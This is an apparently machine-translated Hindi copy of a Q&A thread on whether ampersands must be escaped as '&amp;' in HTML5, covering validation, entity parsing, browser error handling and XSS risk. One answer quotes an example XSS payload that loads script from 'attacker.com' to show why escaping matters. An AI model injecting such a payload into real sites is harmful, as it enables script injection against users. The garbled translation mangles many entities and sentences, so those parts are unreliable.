क्या मुझे वास्तव में '&' के रूप में '& amp' को एनकोड करना होगा?

मैं &अपनी साइट में HTML5 और UTF-8 के साथ एक ' ' प्रतीक का उपयोग कर रहा हूं <title>। Google अपने SERPs पर एम्परसेंड को ठीक दिखाता है, जैसा कि उनके शीर्षकों में सभी ब्राउज़र करते हैं।

http://validator.w3.org मुझे यह दे रहा है:

& एक चरित्र संदर्भ शुरू नहीं किया। (और शायद के रूप में बच जाना चाहिए था &।)

क्या मुझे वास्तव में करने की आवश्यकता है &?

मुझे मान्य करने के लिए मेरे पृष्ठों को मान्य करने के बारे में नहीं बताया गया है, लेकिन मैं इस पर लोगों की राय सुनने के लिए उत्सुक हूं और यदि यह महत्वपूर्ण है और क्यों।

हाँ। HTML में त्रुटि के रूप में कहा गया है, विशेषताएँ #PCDATA हैं जिसका अर्थ है कि वे पार्स हैं। इसका मतलब है कि आप विशेषताओं में वर्ण संस्थाओं का उपयोग कर सकते हैं। &स्वयं का उपयोग करना गलत है और यदि उदार ब्राउज़रों के लिए नहीं है और यह तथ्य कि यह एचटीएमएल नहीं एक्सएचटीएमएल है, पार्सिंग को तोड़ देगा। बस के रूप में यह बच &और सब कुछ ठीक हो जाएगा।

HTML5 आपको इसे बिना छोड़े छोड़ने की अनुमति देता है, लेकिन केवल तब जब निम्न डेटा एक मान्य वर्ण संदर्भ की तरह नहीं दिखता है। हालाँकि, इस प्रतीक के सभी उदाहरणों से बचना बेहतर है, इस चिंता से कि कौन सा होना चाहिए और किन लोगों को होने की आवश्यकता नहीं है।

इस बिंदु को ध्यान में रखें; यदि आप & amp; से बच नहीं रहे हैं, तो आपके द्वारा बनाए गए डेटा के लिए यह काफी बुरा है (जहां कोड बहुत अच्छी तरह से अमान्य हो सकता है), आप टैग डेलिमिटर से भी बच नहीं सकते हैं, जो उपयोगकर्ता द्वारा प्रस्तुत डेटा के लिए एक बड़ी समस्या है, जो बहुत अच्छी तरह से HTML और स्क्रिप्ट इंजेक्शन, कुकी चोरी और अन्य कारनामों को जन्म दे सकता है।

कृपया अपने कोड से बच जाएं। यह आपको भविष्य में बहुत परेशानी से बचाएगा।

एक तरफ मान्यता, तथ्य यह है कि कुछ वर्ण एन्कोडिंग एक HTML दस्तावेज़ के लिए महत्वपूर्ण है ताकि यह एक वेब पेज के रूप में ठीक से और सुरक्षित रूप से प्रस्तुत कर सके।

एन्कोडिंग &के रूप में &सभी परिस्थितियों में, मेरे लिए, से जीने के लिए त्रुटियों और विफलताओं की संभावना को कम करने के लिए एक आसान नियम है।

निम्नलिखित की तुलना करें: जो आसान है? जो आसान है अप मैथुन करने के लिए ?

पद्धति 1

1. कुछ सामग्री लिखें जिसमें एम्परसेंड अक्षर शामिल हैं।
2. इन सभी को एनकोड करें।

कार्यप्रणाली २

(नमक के एक दाने के साथ, कृपया;))

1. कुछ सामग्री लिखें जिसमें एक एम्परसेंड वर्ण शामिल हैं।
2. केस-दर-मामला आधार पर, प्रत्येक एम्परसेंड को देखें। निर्धारित करें यदि:
   • यह अलग-थलग है, और इस तरह के रूप में स्पष्ट रूप से एक एम्परसेंड। जैसे। volt & amp
      > उस मामले में यह एन्कोडिंग को परेशान नहीं करता है।
   • यह अलग-थलग नहीं है, लेकिन आपको लगता है कि यह पूरी तरह से अस्पष्ट है, क्योंकि परिणामस्वरूप इकाई मौजूद नहीं है और कभी भी अस्तित्व में नहीं होगी क्योंकि इकाई सूची कभी भी विकसित नहीं हो सकती है। उदाहरण के लिए amp&volt
      > उस मामले में इसे एन्कोडिंग परेशान न करें।
   • यह अलग नहीं है, और अस्पष्ट है। जैसे। volt&amp
      > इसे एनकोड करें।

??

HTML5 नियम HTML4 से भिन्न हैं। यह HTML5 में आवश्यक नहीं है - जब तक कि एम्परसेंड ऐसा नहीं लगता कि यह एक पैरामीटर नाम शुरू करता है। "और कॉपी = 2" अभी भी एक समस्या है, उदाहरण के लिए, चूंकि और कॉपी; कॉपीराइट प्रतीक है।

हालांकि यह मुझे लगता है कि निम्नलिखित पाठ के आधार पर सांकेतिक शब्दों में बदलना या नहीं तय करना कठिन काम है। तो सबसे आसान रास्ता शायद हर समय सांकेतिक है।

मुझे लगता है कि यह "ब्राउज़र की परवाह न करने पर कल्पना का पालन क्यों करें" के एक प्रश्न में बदल गया है। यहाँ मेरा सामान्यीकृत उत्तर है:

मानक कोई "वर्तमान" चीज नहीं है। वे एक "भविष्य" चीज हैं। यदि हम, डेवलपर्स के रूप में, वेब मानकों का पालन करते हैं, तो ब्राउज़र विक्रेता उन मानकों को सही ढंग से लागू करने की अधिक संभावना रखते हैं, और हम पूरी तरह से इंटरऑपरेबल वेब के करीब चले जाते हैं, जहां सीएसएस हैक, फीचर डिटेक्शन और ब्राउज़र का पता लगाना आवश्यक नहीं है। जहां हमें यह पता लगाने की ज़रूरत नहीं है कि किसी विशेष ब्राउज़र में हमारे लेआउट क्यों टूटते हैं, या उसके आसपास कैसे काम करना है।

विशेष रूप से, यदि HTML5 को & amp का उपयोग करने की आवश्यकता नहीं है; आपकी विशिष्ट स्थिति में, और आप एक HTML5 सिद्धांत का उपयोग कर रहे हैं (और यह भी अपेक्षा करते हैं कि आपके उपयोगकर्ता HTML5-अनुरूप ब्राउज़र का उपयोग कर रहे हैं), तो ऐसा करने का कोई कारण नहीं है।

खैर, अगर यह उपयोगकर्ता इनपुट से आता है तो बिल्कुल हाँ, स्पष्ट कारणों के लिए। सोचें कि क्या यह बहुत वेबसाइट ने ऐसा नहीं किया: इस सवाल का शीर्षक यह दिखाएगा कि क्या मुझे वास्तव में '&' के रूप में '&' को एनकोड करना है?

अगर यह कुछ ऐसा ही है echo '<title>Dolce & Gabbana</title>';तो सख्ती से बोलना आपको नहीं है। यह बेहतर होगा, लेकिन यदि आप कोई उपयोगकर्ता नहीं करते हैं तो अंतर पर ध्यान नहीं दिया जाएगा।

क्या आप हमें दिखा सकते हैं कि आपका titleवास्तव में क्या है? जब मैं जमा करता हूँ

<!DOCTYPE html>
<html>
<title>Dolce & Gabbana</title>
<body>
<p>am i allowed loose & mpersands?</p>
</body>
</html>

करने के लिए http://validator.w3.org/ - स्पष्ट रूप से प्रयोगात्मक एचटीएमएल 5 मोड का उपयोग करने के लिए इसे पूछ - इसके बारे में कोई शिकायत नहीं है &s ...

HTML &में एक संदर्भ की शुरुआत, या तो एक चरित्र संदर्भ या एक इकाई संदर्भ का प्रतीक है । उस बिंदु से पार्सर पर या तो एक #चरित्र संदर्भ को दर्शाता है, या एक इकाई का नाम एक इकाई के संदर्भ को निरूपित करता है, दोनों एक का अनुसरण करते हैं ;। वह सामान्य व्यवहार है।

लेकिन अगर संदर्भ नाम या सिर्फ संदर्भ उद्घाटन &एक सफेद स्थान या अन्य सीमांकक द्वारा पीछा किया जाता तरह ", ', <, >, &, न खत्म होने वाली ;और यहां तक कि एक एक सादे प्रतिनिधित्व करने के लिए संदर्भ &छोड़ा जा सकता है:

<p title="&amp;">foo &amp; bar</p>
<p title="&amp">foo &amp bar</p>
<p title="&">foo & bar</p>

केवल इन मामलों में समाप्त होने ;या यहां तक ​​कि संदर्भ को स्वयं छोड़ा जा सकता है (कम से कम HTML 4 में)। मुझे लगता है कि HTML 5 को समाप्त करने की आवश्यकता है ;।

लेकिन विनिर्देश हमेशा भ्रम से बचने के लिए चरित्र संदर्भ &या इकाई संदर्भ जैसे संदर्भ का उपयोग करने की सलाह देते हैं& :

लेखकों को चरित्र संदर्भ (इकाई संदर्भ खुला सीमांकक) की शुरुआत के साथ भ्रम से बचने के लिए &" &" के बजाय " " (ASCII दशमलव 38) का उपयोग करना चाहिए । लेखकों को भी &विशेषता मानों में " " का उपयोग करना चाहिए क्योंकि CDATA विशेषता मानों के भीतर वर्ण संदर्भों की अनुमति है।

यदि उपयोगकर्ता इसे आपको पास करता है, या यह URL में हवा देगा, तो आपको इससे बचने की आवश्यकता है।

यदि यह एक पृष्ठ पर स्थिर पाठ में दिखाई देता है? सभी ब्राउज़रों को यह एक ही रास्ता मिलेगा, आप इसके बारे में ज्यादा चिंता न करें, क्योंकि यह काम करेगा।

अद्यतन (मार्च 2020): W3C सत्यापनकर्ता अब URL से बचने के बारे में शिकायत नहीं करता है।

मैं जाँच कर रहा था कि Image URL की आवश्यकता क्यों बच रही है, इसलिए इसे https://validator.w3.org में आज़माया । स्पष्टीकरण बहुत अच्छा है। यह इस बात पर प्रकाश डालता है कि यहां तक ​​कि URL के बच जाने की आवश्यकता है। [पुनश्च: मुझे लगता है कि URL की आवश्यकता के बाद से इसका उपभोग होने पर यह अप्राप्त हो जाएगा &। क्या कोई स्पष्ट कर सकता है?]

<img alt="" src="foo?bar=qut&qux=fop" />

दस्तावेज़ में एक इकाई संदर्भ पाया गया था, लेकिन उस नाम द्वारा परिभाषित कोई संदर्भ नहीं है। अक्सर यह संदर्भ नाम को मिस करने, अनएन्कोडेड एम्परसेंड्स या ट्रेलिंग सेमोलोन (;) को छोड़ने से होता है। इस त्रुटि का सबसे आम कारण URL में unencoded ampersands है जैसा कि WDG द्वारा "URLs में Ampersands" में वर्णित है। इकाई संदर्भ एक एम्परसेंड (और) से शुरू होते हैं और एक अर्धविराम (;) के साथ समाप्त होते हैं। यदि आप अपने दस्तावेज़ में शाब्दिक एम्परसेंड का उपयोग करना चाहते हैं, तो आपको इसे "&" (URL के अंदर भी) के रूप में एन्कोड करना होगा। एक अर्धविराम के साथ इकाई संदर्भों को समाप्त करने के लिए सावधान रहें या आपके पाठ के संदर्भ में निम्नलिखित पाठ के संबंध में व्याख्या की जा सकती है। यह भी ध्यान रखें कि नामित इकाई संदर्भ केस-संवेदी हैं; & Aelig; और æ अलग-अलग वर्ण हैं।

हां, यदि संभव हो तो आपको मान्य कोड की सेवा करने का प्रयास करना चाहिए।

अधिकांश ब्राउज़र चुपचाप इस त्रुटि को ठीक कर देंगे, लेकिन ब्राउज़र में त्रुटि से निपटने पर भरोसा करने में समस्या है। गलत कोड को कैसे हैंडल करना है, इसके लिए कोई मानक नहीं है, इसलिए यह प्रत्येक ब्राउज़र विक्रेता के ऊपर है कि वह यह पता लगाने की कोशिश करे कि प्रत्येक त्रुटि के साथ क्या करना है, और परिणाम भिन्न हो सकते हैं।

कुछ उदाहरण जहां ब्राउज़र अलग-अलग प्रतिक्रिया करने की संभावना रखते हैं, यदि आप तत्वों को एक तालिका के अंदर लेकिन तालिका कोशिकाओं के बाहर रखते हैं, या यदि आप एक दूसरे के अंदर लिंक करते हैं।

आपके विशिष्ट उदाहरण के लिए यह किसी भी समस्या का कारण होने की संभावना नहीं है, लेकिन ब्राउज़र में त्रुटि सुधार उदाहरण के लिए हो सकता है कि ब्राउज़र मानकों के अनुरूप मोड से quirks मोड में बदल सकता है, जिससे आपका लेआउट पूरी तरह से टूट सकता है।

इसलिए, आपको कोड में इस तरह की त्रुटियों को ठीक करना चाहिए, यदि कुछ और के लिए नहीं है तो सत्यापनकर्ता की त्रुटि सूची को कम रखने के लिए, ताकि आप और अधिक गंभीर समस्याएं ला सकें।

कुछ साल पहले, हमें एक रिपोर्ट मिली थी कि हमारा एक वेब ऐप फ़ायरफ़ॉक्स में सही ढंग से प्रदर्शित नहीं हो रहा था। यह पता चला कि पृष्ठ में एक टैग शामिल था जो दिखता था

<div style="..." ... style="...">

जब दोहराया शैली विशेषता के साथ सामना किया जाता है, IE दोनों शैलियों को जोड़ती है, जबकि फ़ायरफ़ॉक्स केवल उनमें से एक का उपयोग करता है, इसलिए अलग व्यवहार। मैंने टैग को बदल दिया है

<div style="...; ..." ...>

और यकीन है कि पर्याप्त, यह समस्या तय हो गई! कहानी का नैतिक यह है कि ब्राउज़रों के पास अवैध HTML की तुलना में वैध HTML के अधिक सुसंगत हैंडलिंग है। तो, अपने लानत मार्कअप को पहले से ही ठीक कर लें! (या इसे ठीक करने के लिए HTML साफ का उपयोग करें।)

अगर html& में प्रयोग किया जाता है तो आपको इससे बचना चाहिए

यदि &इसका उपयोग जावास्क्रिप्ट स्ट्रिंग्स में किया जाता है जैसे कि एक alert('This & that');या document.href तो आपको इसका उपयोग करने की आवश्यकता नहीं है।

यदि आप डॉक्यूमेंट का उपयोग कर रहे हैं, तो आपको इसका उपयोग करना चाहिए document.write(<p>this &amp; that</p>)

यह एक अर्धविराम आपके पास समाप्त होने की संभावना पर निर्भर करता है &, जिससे यह कुछ अलग प्रदर्शित करता है।

उदाहरण के लिए, जब उपयोगकर्ताओं से इनपुट के साथ काम करना (कहते हैं, यदि आप अपने शीर्षक टैग में एक मंच पोस्ट के उपयोगकर्ता-प्रदान किए गए विषय को शामिल करते हैं), तो आप कभी नहीं जानते कि वे यादृच्छिक अर्धविराम कहां डाल सकते हैं, और यह बेतरतीब ढंग से अजीब संस्थाओं को प्रदर्शित कर सकता है। इसलिए हमेशा उस स्थिति में बचकर रहें।

अपने स्वयं के स्थिर html के लिए, निश्चित रूप से, आप इसे छोड़ सकते हैं, लेकिन उचित पलायन को शामिल करना इतना तुच्छ है, कि इससे बचने का कोई अच्छा कारण नहीं है।

यदि आप वास्तव में स्थैतिक पाठ के बारे में बात कर रहे हैं

<title>Foo & Bar</title>

हार्ड डिस्क पर कुछ फ़ाइल में संग्रहीत और सीधे एक सर्वर द्वारा परोसा जाता है, तो हाँ: यह शायद बचने की आवश्यकता नहीं है।

हालाँकि, आजकल बहुत कम HTML सामग्री है जो पूरी तरह से स्थिर है, मैं निम्नलिखित अस्वीकरण जोड़ूंगा जो मानता है कि HTML सामग्री किसी अन्य स्रोत (डेटाबेस सामग्री, उपयोगकर्ता इनपुट, वेब सेवा कॉल परिणाम, विरासत एपीआई परिणाम) से उत्पन्न हुई है। ..):

आप एक सरल भागने नहीं है, तो &, तो संभावना है कि आप भी एक से बच नहीं करते हैं &या एक  या <b>या <script src="http://attacker.com/evil.js">या किसी अन्य अवैध पाठ। इसका मतलब यह होगा कि आप अपनी सामग्री को गलत तरीके से प्रदर्शित कर रहे हैं और अधिक संभावना है कि XSS हमलों के लिए संदिग्ध हैं ।

दूसरे शब्दों में: जब आप पहले से ही अन्य समस्याग्रस्त मामलों की जांच कर रहे हैं और बच रहे हैं, तो लगभग पूरी तरह से टूटे-फूटे-लेकिन-अभी भी कुछ-कुछ-स्थिर-स्टैंडअलोन को छोड़ने का कोई कारण नहीं है- और अनसेफ।

सुनिश्चित नहीं है कि यह किसी के लिए उपयोगी है ... मैं थोड़ी देर के लिए यह लड़ रहा था ... यहाँ एक शानदार रेगेक्स है जिसका उपयोग आप अपने सभी लिंक, जावास्क्रिप्ट, सामग्री को ठीक करने के लिए कर सकते हैं। मुझे एक टन विरासत सामग्री से निपटना पड़ा जिसे कोई भी सही नहीं करना चाहता था।

इसे अपने मास्टर पृष्ठ या नियंत्रण में अपने रेंडर ओवरराइड में जोड़ें:

कृपया इसे गलत स्थान पर रखने के लिए मुझे न भड़काएं:

// remove the & from href="blaw?a=b&b=c" and replace with & 
//in urls - this corrects any unencoded & not just those in URL's
// this match will also ignore any matches it finds within <script> blocks AND
// it will also ignore the matches where the link includes a javascript command like
// <a href="javascript:alert{'& & &'}">blaw</a>
html = Regex.Replace(html, "&(?!(?<=(?<outerquote>[\"'])javascript:(?>(?!\\k<outerquote>|[>]).)*)\\k<outerquote>?)(?!(?:[a-zA-Z][a-zA-Z0-9]*|#\\d+);)(?!(?>(?:(?!<script|\\/script>).)*)\\/script>)", "&amp;", RegexOptions.Singleline | RegexOptions.IgnoreCase);

लिंक का एक अच्छा उदाहरण है कि आपको कब और क्यों भागने की आवश्यकता हो सकती &है&

https://jsfiddle.net/vh2h7usk/1/

दिलचस्प बात यह है कि मुझे अपने उत्तर में यहां ठीक से प्रतिनिधित्व करने के लिए चरित्र से बचना पड़ा। यदि मैं बिल्ट-इन कोड नमूना विकल्प (उत्तर पैनल से) का उपयोग करने के लिए था , तो मैं बस टाइप कर सकता हूं &और यह वैसा ही दिखाई देता है जैसा कि यह होना चाहिए। लेकिन अगर मैं मैन्युअल रूप से <code></code>तत्व का उपयोग करने के लिए था , तो मुझे इसे सही ढंग से प्रतिनिधित्व करने के लिए बचना होगा :)